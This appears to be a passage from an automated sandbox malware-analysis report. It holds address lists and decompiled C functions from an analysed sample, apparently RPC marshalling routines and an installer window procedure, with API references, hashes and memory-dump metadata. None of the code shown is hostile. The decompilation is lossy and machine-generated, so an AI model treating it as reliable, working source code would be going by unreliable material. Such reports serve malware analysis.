                                                                                                0x6eda95f9
                                                                                                0x6eda95fc
                                                                                                0x6eda95ff
                                                                                                0x6eda9600
                                                                                                0x6eda9605
                                                                                                0x6eda960a
                                                                                                0x6eda960d
                                                                                                0x6eda9610
                                                                                                0x6eda9613
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9671
                                                                                                0x6eda9673
                                                                                                0x6eda967b
                                                                                                0x6eda9683
                                                                                                0x6eda9686
                                                                                                0x6eda9687
                                                                                                0x6eda968a
                                                                                                0x6eda968c
                                                                                                0x6eda968d
                                                                                                0x6eda9692
                                                                                                0x6eda9697
                                                                                                0x6eda969a
                                                                                                0x6eda969d
                                                                                                0x6eda96a0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9726
                                                                                                0x6eda9728
                                                                                                0x6eda972c
                                                                                                0x6eda9730
                                                                                                0x6eda9738
                                                                                                0x6eda973b
                                                                                                0x6eda973c
                                                                                                0x6eda973f
                                                                                                0x6eda9743
                                                                                                0x6eda9746
                                                                                                0x6eda974b
                                                                                                0x6eda9750
                                                                                                0x6eda9755
                                                                                                0x6eda9758
                                                                                                0x6eda975b
                                                                                                0x6eda975e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9766
                                                                                                0x6eda9768
                                                                                                0x6eda9770
                                                                                                0x6eda9778
                                                                                                0x6eda977b
                                                                                                0x6eda977c
                                                                                                0x6eda977f
                                                                                                0x6eda9782
                                                                                                0x6eda9783
                                                                                                0x6eda9785
                                                                                                0x6eda9786
                                                                                                0x6eda978b
                                                                                                0x6eda978e
                                                                                                0x6eda978f
                                                                                                0x6eda9794
                                                                                                0x6eda9799
                                                                                                0x6eda979f
                                                                                                0x6eda97a2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda97aa
                                                                                                0x6eda97ac
                                                                                                0x6eda97b0
                                                                                                0x6eda97b4
                                                                                                0x6eda97bc
                                                                                                0x6eda97bf
                                                                                                0x6eda97c0
                                                                                                0x6eda97c3
                                                                                                0x6eda97c6
                                                                                                0x6eda97ca
                                                                                                0x6eda97cf
                                                                                                0x6eda97d4
                                                                                                0x6eda97d9
                                                                                                0x6eda97dc
                                                                                                0x6eda97df
                                                                                                0x6eda97e2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda961b
                                                                                                0x6eda961d
                                                                                                0x6eda9625
                                                                                                0x6eda962d
                                                                                                0x6eda9631
                                                                                                0x6eda9634
                                                                                                0x6eda9636
                                                                                                0x6eda9639
                                                                                                0x6eda963a
                                                                                                0x6eda963d
                                                                                                0x6eda963f
                                                                                                0x6eda9640
                                                                                                0x6eda9645
                                                                                                0x6eda964a
                                                                                                0x6eda964d
                                                                                                0x6eda9656
                                                                                                0x6eda9658
                                                                                                0x6eda965d
                                                                                                0x6eda965d
                                                                                                0x6eda9663
                                                                                                0x6eda9663
                                                                                                0x6eda9666
                                                                                                0x6eda9669
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda97ea
                                                                                                0x6eda97ea
                                                                                                0x6eda97f1
                                                                                                0x6eda97f4
                                                                                                0x6eda97f5
                                                                                                0x6eda97fa
                                                                                                0x6eda97ff
                                                                                                0x6eda9802
                                                                                                0x6eda9805
                                                                                                0x6eda980b
                                                                                                0x6eda980d
                                                                                                0x6eda9810
                                                                                                0x6eda9810
                                                                                                0x6eda9813
                                                                                                0x6eda9816
                                                                                                0x6eda981c
                                                                                                0x6eda9823
                                                                                                0x6eda9827
                                                                                                0x6eda982c
                                                                                                0x6eda982f
                                                                                                0x6eda9832
                                                                                                0x6eda9835
                                                                                                0x6eda9838
                                                                                                0x6eda983f
                                                                                                0x6eda9860
                                                                                                0x6eda9863
                                                                                                0x6eda9869
                                                                                                0x6eda9871
                                                                                                0x6eda9876
                                                                                                0x6eda9841
                                                                                                0x6eda9841
                                                                                                0x6eda9844
                                                                                                0x6eda9847
                                                                                                0x6eda984a
                                                                                                0x6eda984d
                                                                                                0x6eda9850
                                                                                                0x6eda9857
                                                                                                0x6eda9857
                                                                                                0x6eda9879
                                                                                                0x6eda987e
                                                                                                0x6eda9882
                                                                                                0x6eda9885
                                                                                                0x6eda9888
                                                                                                0x6eda988c
                                                                                                0x6eda9890
                                                                                                0x6eda9894
                                                                                                0x6eda98a0
                                                                                                0x6eda9935
                                                                                                0x6eda9935
                                                                                                0x6eda9938
                                                                                                0x6eda993e
                                                                                                0x6eda994e
                                                                                                0x6eda9951
                                                                                                0x6eda9940
                                                                                                0x6eda9940
                                                                                                0x6eda9943
                                                                                                0x6eda9946
                                                                                                0x6eda9946
                                                                                                0x6eda9957
                                                                                                0x6eda995a
                                                                                                0x00000000
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a9
                                                                                                0x6eda98ac
                                                                                                0x6eda98ad
                                                                                                0x6eda98b0
                                                                                                0x6eda98b2
                                                                                                0x6eda98b8
                                                                                                0x6eda98bb
                                                                                                0x6eda98bc
                                                                                                0x6eda98c1
                                                                                                0x6eda98c6
                                                                                                0x6eda98c9
                                                                                                0x6eda98cc
                                                                                                0x6eda98ce
                                                                                                0x6eda98d1
                                                                                                0x6eda98d4
                                                                                                0x6eda98d7
                                                                                                0x6eda98dd
                                                                                                0x6eda98df
                                                                                                0x6eda98e2
                                                                                                0x6eda98e4
                                                                                                0x6eda98e7
                                                                                                0x6eda98ea
                                                                                                0x6eda98ed
                                                                                                0x6eda98f3
                                                                                                0x6eda98f5
                                                                                                0x6eda98f6
                                                                                                0x6eda98fb
                                                                                                0x6eda9900
                                                                                                0x6eda9900
                                                                                                0x6eda9903
                                                                                                0x6eda9903
                                                                                                0x6eda9907
                                                                                                0x6eda990a
                                                                                                0x6eda990d
                                                                                                0x6eda9910
                                                                                                0x6eda9913
                                                                                                0x6eda9916
                                                                                                0x6eda9919
                                                                                                0x6eda991c
                                                                                                0x6eda991f
                                                                                                0x6eda9925
                                                                                                0x6eda9929
                                                                                                0x6eda992d
                                                                                                0x6eda9932
                                                                                                0x00000000
                                                                                                0x6eda9925
                                                                                                0x00000000
                                                                                                0x6eda9962
                                                                                                0x6eda9964
                                                                                                0x6eda9968
                                                                                                0x6eda996c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9979
                                                                                                0x6eda997b
                                                                                                0x6eda997f
                                                                                                0x6eda9983
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9990
                                                                                                0x6eda9992
                                                                                                0x6eda999a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda99a7
                                                                                                0x6eda99a7
                                                                                                0x6eda99ad
                                                                                                0x6eda99b7
                                                                                                0x6eda99bf
                                                                                                0x6eda99c2
                                                                                                0x6eda99c5
                                                                                                0x6eda99c8
                                                                                                0x6eda99cc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9ab5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda96a8
                                                                                                0x6eda96aa
                                                                                                0x6eda96b2
                                                                                                0x6eda96ba
                                                                                                0x6eda96bd
                                                                                                0x6eda96c0
                                                                                                0x6eda96c2
                                                                                                0x6eda96c5
                                                                                                0x6eda96c6
                                                                                                0x6eda96c9
                                                                                                0x6eda96cb
                                                                                                0x6eda96cc
                                                                                                0x6eda96d1
                                                                                                0x6eda96d6
                                                                                                0x6eda96dc
                                                                                                0x6eda96df
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda96e7
                                                                                                0x6eda96e9
                                                                                                0x6eda96ed
                                                                                                0x6eda96f9
                                                                                                0x6eda96fc
                                                                                                0x6eda96ff
                                                                                                0x6eda9701
                                                                                                0x6eda9704
                                                                                                0x6eda9705
                                                                                                0x6eda9708
                                                                                                0x6eda970a
                                                                                                0x6eda970b
                                                                                                0x6eda9710
                                                                                                0x6eda9715
                                                                                                0x6eda971b
                                                                                                0x6eda971e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda95a4
                                                                                                0x6eda9adf
                                                                                                0x6eda9adf

                                                                                                APIs
                                                                                                Strings
                                                                                                • no unmarshaller for embedded type %02x, xrefs: 6EDA9A91
                                                                                                • embedded complex (size=%d) => %p, xrefs: 6EDA9A19
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: _memset
                                                                                                • String ID: embedded complex (size=%d) => %p$no unmarshaller for embedded type %02x
                                                                                                • API String ID: 2102423945-1287812044
                                                                                                • Opcode ID: c77135f87002b37bba7b2044ac27a6ca613594af9411f3590cf9dc31f9660cdf
                                                                                                • Instruction ID: 11bf148d141c6979c0e5e7a10b461716e9387dfcb04069f163b5a6640ceaa6cc
                                                                                                • Opcode Fuzzy Hash: c77135f87002b37bba7b2044ac27a6ca613594af9411f3590cf9dc31f9660cdf
                                                                                                • Instruction Fuzzy Hash: BA3118B5A00249AFCB04CF98D8A1AEF7BB5BF89301F148559FA559B244D331EB50CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA52A0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 37%
                                                                                                			E6EDA52A0(intOrPtr _a4, intOrPtr _a8, signed char* _a12) {
				signed char* _v8;
				signed char* _v12;
				signed int _v16;
				signed int _t43;

				_v8 = _a12;
				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
				if(( *_v8 & 0x000000ff) == 0x1d || ( *_v8 & 0x000000ff) == 0x1e) {
					E6EDA73B0(_a4 + 0x14, (_v8[1] & 0x000000ff) + 1);
					if(( *_v8 & 0x000000ff) != 0x1d) {
						_v12 = _a12;
						_v16 =  *((intOrPtr*)(_v12 + 2));
						_a12 = _v12 + 6;
					} else {
						_v16 = _v8[2] & 0x0000ffff;
						_a12 =  &(_v8[4]);
					}
					E6EDAAF50(_a4, _v16);
					return E6EDAC570(_a4, _a8, _a12);
				} else {
					_t43 =  *_v8 & 0x000000ff;
					0x6eda0000("invalid format type %x\n", _t43);
					__imp__RpcRaiseException(0x6e6);
					return _t43;
				}
			}







                                                                                                0x6eda52a9
                                                                                                0x6eda52bd
                                                                                                0x6eda52ce
                                                                                                0x6eda530e
                                                                                                0x6eda531f
                                                                                                0x6eda5339
                                                                                                0x6eda5342
                                                                                                0x6eda534b
                                                                                                0x6eda5321
                                                                                                0x6eda5328
                                                                                                0x6eda5331
                                                                                                0x6eda5331
                                                                                                0x6eda5356
                                                                                                0x00000000
                                                                                                0x6eda52db
                                                                                                0x6eda52de
                                                                                                0x6eda52e7
                                                                                                0x6eda52f4
                                                                                                0x00000000
                                                                                                0x6eda52f4

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA52F4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-2648126113
                                                                                                • Opcode ID: 4640751bc7f1e877b67c68dbcc4aedacf9f4bee66625c3d92cdb7a275101c5aa
                                                                                                • Instruction ID: 9a7eab99e53e4ab3a8427dc083218bf16a8c67030cea197e1cd81dc2c8a90a56
                                                                                                • Opcode Fuzzy Hash: 4640751bc7f1e877b67c68dbcc4aedacf9f4bee66625c3d92cdb7a275101c5aa
                                                                                                • Instruction Fuzzy Hash: 512160B5A04148EFCB04CFDDD8909AE7BB6AF85205F14C198F9589B345E3309F20DB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA6520, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 46%
                                                                                                			E6EDA6520(signed int _a4, signed char* _a8) {
				void* _t53;
				void* _t54;

				0x6eda0000("(pStubMsg == ^%p, pFormat == ^%p)\n", _a4, _a8);
				_t54 = _t53 + 0xc;
				if(( *_a8 & 0x000000ff) != 0x22 && ( *_a8 & 0x000000ff) != 0x25) {
					0x6eda0000("Unhandled string type: %#x\n",  *_a8 & 0x000000ff);
					_t54 = _t54 + 8;
					__imp__RpcRaiseException(0x6f7);
				}
				if(( *_a8 & 0x000000ff) != 0x22) {
					E6EDAD650(0x25, _a4, _a8);
					E6EDADE30(0x25, _a4, _a8, 1);
				} else {
					E6EDAD650(0x22, _a4, _a8);
					E6EDADE30(0x22, _a4, _a8, 1);
				}
				return  *((intOrPtr*)(_a4 + 0x18));
			}





                                                                                                0x6eda6530
                                                                                                0x6eda6535
                                                                                                0x6eda654a
                                                                                                0x6eda6575
                                                                                                0x6eda657a
                                                                                                0x6eda6582
                                                                                                0x6eda6582
                                                                                                0x6eda659a
                                                                                                0x6eda65ce
                                                                                                0x6eda65e2
                                                                                                0x6eda659c
                                                                                                0x6eda65a6
                                                                                                0x6eda65ba
                                                                                                0x6eda65bf
                                                                                                0x6eda65f1

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA6582
                                                                                                Strings
                                                                                                • Unhandled string type: %#x, xrefs: 6EDA6570
                                                                                                • (pStubMsg == ^%p, pFormat == ^%p), xrefs: 6EDA652B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (pStubMsg == ^%p, pFormat == ^%p)$Unhandled string type: %#x
                                                                                                • API String ID: 3997070919-3846614787
                                                                                                • Opcode ID: 32eec9f59b2f760c69db160ef6d74da0b4d0c3b2d8c317f80c70bc79eab529cd
                                                                                                • Instruction ID: 849cacfa186914060d7ed9399c15b9cbea4a10ed1b0395dff3f317d7539233fb
                                                                                                • Opcode Fuzzy Hash: 32eec9f59b2f760c69db160ef6d74da0b4d0c3b2d8c317f80c70bc79eab529cd
                                                                                                • Instruction Fuzzy Hash: FF216F75600004BBE708DF9CD891EAE776ADB89304F00C019FE598F2C6D671EB918BA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA3410, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 37%
                                                                                                			E6EDA3410(void* __ecx, signed int _a4, void* _a8, signed char* _a12, signed int _a16) {
				signed int _v8;
				void* _t51;
				void* _t52;

				0x6eda0000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff, __ecx);
				_t52 = _t51 + 0x14;
				_t37 = _a12;
				if(( *_a12 & 0x000000ff) != 0x11) {
					E6EDA73D0(_t37, _a4 + 4, 4);
					_v8 =  *((intOrPtr*)(_a4 + 4));
					E6EDAAF00(_a4, 4);
					_t52 = _t52 + 0x10;
				} else {
					_v8 =  *((intOrPtr*)(_a4 + 4));
					if(( *(_a4 + 0x20) & 0x000000ff) != 0 &&  *_a8 == 0) {
						0x6eda0000("NULL ref pointer is not allowed\n");
						_t52 = _t52 + 4;
						__imp__RpcRaiseException(0x6f4);
					}
				}
				E6EDAB580(_a4, _v8, _a8,  *_a8, _a12, _a16 & 0x000000ff);
				return 0;
			}






                                                                                                0x6eda342a
                                                                                                0x6eda342f
                                                                                                0x6eda3432
                                                                                                0x6eda343b
                                                                                                0x6eda347c
                                                                                                0x6eda348a
                                                                                                0x6eda3493
                                                                                                0x6eda3498
                                                                                                0x6eda343d
                                                                                                0x6eda3443
                                                                                                0x6eda344f
                                                                                                0x6eda345e
                                                                                                0x6eda3463
                                                                                                0x6eda346b
                                                                                                0x6eda346b
                                                                                                0x6eda3471
                                                                                                0x6eda34b6
                                                                                                0x6eda34c3

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F4), ref: 6EDA346B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p,%p,%d)$NULL ref pointer is not allowed
                                                                                                • API String ID: 3997070919-1100665054
                                                                                                • Opcode ID: 6bcac07e8fa8e2e983060ca5d613a836230e4ce4320869ef7de2d349db8f09eb
                                                                                                • Instruction ID: 34cbb550d7f96c84721e7fd9b50903da157280010492d746ff9ad1ff906bd7b0
                                                                                                • Opcode Fuzzy Hash: 6bcac07e8fa8e2e983060ca5d613a836230e4ce4320869ef7de2d349db8f09eb
                                                                                                • Instruction Fuzzy Hash: D02162B5604148AFDB04CF98D840DAE77AAAB49344F04C558FE498B345E731EB10CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00404C19, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00404C19(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x429fc0 != _t22) {
							 *0x429fc0 = _t22;
							E0040592B(0x429fd8, 0x42f000);
							E00405889(0x42f000, _t22);
							E0040140B(6);
							E0040592B(0x42f000, 0x429fd8);
						}
						L11:
						return CallWindowProcA( *0x429fc8, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404598(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403D29(0x413);
				return 0;
			}




                                                                                                0x00404c25
                                                                                                0x00404c4a
                                                                                                0x00404c6a
                                                                                                0x00404c6d
                                                                                                0x00404c70
                                                                                                0x00404c87
                                                                                                0x00404c8d
                                                                                                0x00404c94
                                                                                                0x00404c9b
                                                                                                0x00404ca2
                                                                                                0x00404ca7
                                                                                                0x00404cad
                                                                                                0x00000000
                                                                                                0x00404cbd
                                                                                                0x00404c57
                                                                                                0x00404caa
                                                                                                0x00404caa
                                                                                                0x00000000
                                                                                                0x00404caa
                                                                                                0x00404c63
                                                                                                0x00404c65
                                                                                                0x00000000
                                                                                                0x00404c65
                                                                                                0x00404c2b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00404c32
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • IsWindowVisible.USER32(?), ref: 00404C4F
                                                                                                • CallWindowProcA.USER32 ref: 00404CBD
                                                                                                  • Part of subcall function 00403D29: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403D3B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                • String ID:
                                                                                                • API String ID: 3748168415-3916222277
                                                                                                • Opcode ID: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
                                                                                                • Instruction ID: d407fede90f1340f75a9edbd02c1d8e6092547d547c096207559e891c258f88e
                                                                                                • Opcode Fuzzy Hash: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
                                                                                                • Instruction Fuzzy Hash: C1119D71105608BFEF21AF52DD4099B3729EF84769F01803AFA05751E1C37D8C62CB69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA6C90, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA6CE4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-2648126113
                                                                                                • Opcode ID: d90feab92f630bf4a61649687bd2a01710404bc033f1512af59186b6bd7e0f4d
                                                                                                • Instruction ID: 4615a577059ab70d21ad4c35d615337ebeecb26559deafc4e9d12f028067cae9
                                                                                                • Opcode Fuzzy Hash: d90feab92f630bf4a61649687bd2a01710404bc033f1512af59186b6bd7e0f4d
                                                                                                • Instruction Fuzzy Hash: FA1151B5A04148EBCB04CFDCD8909AE7BBAAF86245F148548F9658B345D731DF20DB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA3F20, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA3F20(intOrPtr _a4, intOrPtr _a8, signed char* _a12, signed int _a16) {
				void* _t25;
				void* _t38;
				void* _t39;

				0x6eda0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				if(( *_a12 & 0x000000ff) == 0x1c) {
					E6EDAD650(0x1c, _a4, _a12);
					E6EDAD830(_t25, _t38, _t39, 0x1c, _a4, _a8, _a12, _a16 & 0x000000ff, 1, 1);
					return 0;
				}
				0x6eda0000("invalid format type %x\n",  *_a12 & 0x000000ff);
				__imp__RpcRaiseException(0x6e6);
				return 0;
			}






                                                                                                0x6eda3f39
                                                                                                0x6eda3f53
                                                                                                0x6eda3f8b
                                                                                                0x6eda3faa
                                                                                                0x00000000
                                                                                                0x6eda3fb2
                                                                                                0x6eda3f6a
                                                                                                0x6eda3f77
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA3F77
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p, %d)$invalid format type %x
                                                                                                • API String ID: 3997070919-658257468
                                                                                                • Opcode ID: ff24f26eba3fc5ab63043668c8b6a9935520fa715676177c0ca83b8e5af25e33
                                                                                                • Instruction ID: f725d5fe702c2e0f9ab4d2c74114949e077b4c1ee3a68211fb94396609d80819
                                                                                                • Opcode Fuzzy Hash: ff24f26eba3fc5ab63043668c8b6a9935520fa715676177c0ca83b8e5af25e33
                                                                                                • Instruction Fuzzy Hash: A11161B26441496BEB04DFD8DC51FBB37AE9B89704F048418FA598B281D671DA108B71
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA3E80, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA3E80(intOrPtr _a4, intOrPtr _a8, signed char* _a12, signed int _a16) {
				void* _t24;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t40;

				0x6eda0000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_t40 = _t39 + 0x14;
				if(( *_a12 & 0x000000ff) != 0x1b) {
					0x6eda0000("invalid format = 0x%x\n",  *_a12 & 0x000000ff);
					_t40 = _t40 + 8;
					__imp__RpcRaiseException(0x6f7);
				}
				E6EDAD650(0x1b, _a4, _a12);
				E6EDAD830(_t24, _t37, _t38, 0x1b, _a4, _a8, _a12, _a16 & 0x000000ff, 1, 1);
				return 0;
			}








                                                                                                0x6eda3e99
                                                                                                0x6eda3e9e
                                                                                                0x6eda3eb3
                                                                                                0x6eda3eca
                                                                                                0x6eda3ecf
                                                                                                0x6eda3ed7
                                                                                                0x6eda3ed7
                                                                                                0x6eda3ee7
                                                                                                0x6eda3f06
                                                                                                0x6eda3f11

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA3ED7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p,%p,%d)$invalid format = 0x%x
                                                                                                • API String ID: 3997070919-1752923328
                                                                                                • Opcode ID: 553747771ea6898509e07ffe4e5ccd6ad77ea562ce3b16f6eeedf9972c64e5ab
                                                                                                • Instruction ID: 5cbb9990fa776a94c11f45081f2053148da88e9ad9b1a01522202cc70a92c747
